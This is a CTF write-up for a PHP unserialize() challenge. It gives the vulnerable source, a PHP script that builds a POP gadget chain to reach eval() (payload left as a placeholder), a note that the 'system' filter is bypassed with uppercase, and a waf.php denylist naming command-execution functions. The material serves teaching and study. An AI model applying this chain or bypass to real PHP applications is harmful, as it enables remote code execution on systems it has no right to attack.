<?php
include "waf.php";
// Gadget class: every magic method below acts on attacker-controlled state,
// because unserialize() fills $fun / $txw4ever from the input before any of
// them runs.
class NISA{
public $fun="show_me_flag";
public $txw4ever;
// Runs on unserialize(). With the default $fun it only calls hint() (waf.php).
// The comparison is loose (==): if $fun holds an object that defines
// __toString(), PHP converts it to a string for the comparison, i.e. that
// object's __toString() is called from here.
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
// Any call to an undefined method overwrites $fun with the first argument.
function __call($from,$val){
$this->fun=$val[0];
}
// String conversion echoes $fun; if $fun is an object this triggers that
// object's __toString().
public function __toString()
{
echo $this->fun;
return " ";
}
// Calling the object as a function passes $txw4ever through the denylist
// checkcheck() (waf.php) and then eval()s it. A denylist regex in front of
// eval() is not a control, and @ hides the errors that would otherwise
// surface misuse.
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
// Gadget class: __wakeup() calls a method named nisa() on $ext. No class in this
// file defines nisa(), so the call lands in the __call() handler of whatever
// object $ext was deserialized as (NISA and Ilovetxw both define one), with $x
// as its argument.
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
// Gadget class: both magic methods forward into another attacker-chosen object.
class Ilovetxw{
public $huang;
public $su;
// Any undefined method call writes the first argument into $huang->fun. If that
// property is not accessible on $huang (class four declares $fun private), the
// write is routed to $huang's __set().
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
// String conversion calls $su as a function; when $su is an object that is its
// __invoke() (NISA::__invoke() ends in eval()). The callee's return value is
// returned unchanged.
public function __toString(){
$bb = $this->su;
return $bb();
}
}
// Gadget class: __set() fires when code outside the class writes an inaccessible
// property; $fun is private, so the write in Ilovetxw::__call() ends up here.
class four{
public $a="TXW4EVER";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
// Single '=': this assigns "sixsixsix" to $fun instead of comparing, so the
// condition is always true and the block below always runs.
if ($this->fun = "sixsixsix"){
// Return value discarded; the only effect is converting $a to a string,
// which calls its __toString() if $a was set to an object that defines one.
strtolower($this->a);
}
}
}
// Entry point: unserialize() on the raw ?ser query parameter, which makes every
// class above reachable as a gadget with attacker-chosen property values. With
// no parameter the source is displayed instead.
// NOTE(review): the root issue is unserialize() on untrusted input; the @ only
// hides the notices a malformed payload would produce. unserialize($s,
// ['allowed_classes' => false]) would stop objects from being instantiated at
// all, and a JSON-based format would remove the magic-method surface entirely.
isset($_GET['ser']) ? @unserialize($_GET['ser']) : highlight_file(__FILE__);
//function checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
exp:
<?php
//__wakeup(NISA)==>__toString(Ilovetxw)==>__invoke==>
// Exploit-side stub: only the class name and property names matter for
// serialize(); the magic methods are those of the target's copy of NISA.
class NISA{
public $fun;
public $txw4ever;
}
// Exploit-side stub for the target's Ilovetxw; no methods are needed to
// produce the serialized form.
class Ilovetxw{
public $huang;
public $su;
}
// Builds the nesting described in the comment above: on the target,
// NISA::__wakeup() compares $fun (an Ilovetxw) loosely with a string, which
// calls Ilovetxw::__toString(), which calls $su (a NISA) as a function, whose
// __invoke() reaches eval($txw4ever). 'RCE...' is the author's placeholder;
// the writeup leaves the actual payload out.
$ser=new NISA();
$ser->fun=new Ilovetxw();
$ser->fun->su=new NISA();
$ser->fun->su->txw4ever='RCE...';
echo urlencode(serialize($ser));
?>
pop链的构造其实只需要两个类,另外两个其实可以不用;
主要是最后的checkcheck($data);也不知道到底过滤了什么,还以为是cat ls 等命令,没想到是过滤了system,用大写绕过;
而且flag是fllllllaaag。
waf.php:
<?php
/**
 * Denylist check that NISA::__invoke() runs before eval(). Terminates the
 * script with 'something wrong' when $data matches the pattern; otherwise it
 * returns nothing.
 *
 * The pattern has no /i modifier, so matching is case-sensitive (the writeup
 * above notes that is what lets the check be bypassed). A denylist placed in
 * front of eval() cannot be made complete; the defensive fix is to not eval()
 * untrusted input at all.
 */
function checkcheck($data){
$blocked = preg_match("/\`|\^|\||\~|assert|\?|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk/",$data,$match) === 1;
if ($blocked) {
exit('something wrong');
}
}
/**
 * Prints the challenge hint and stops execution. Called from NISA::__wakeup()
 * when $fun still holds its default value.
 */
function hint(){
print "flag is in /";
exit();
}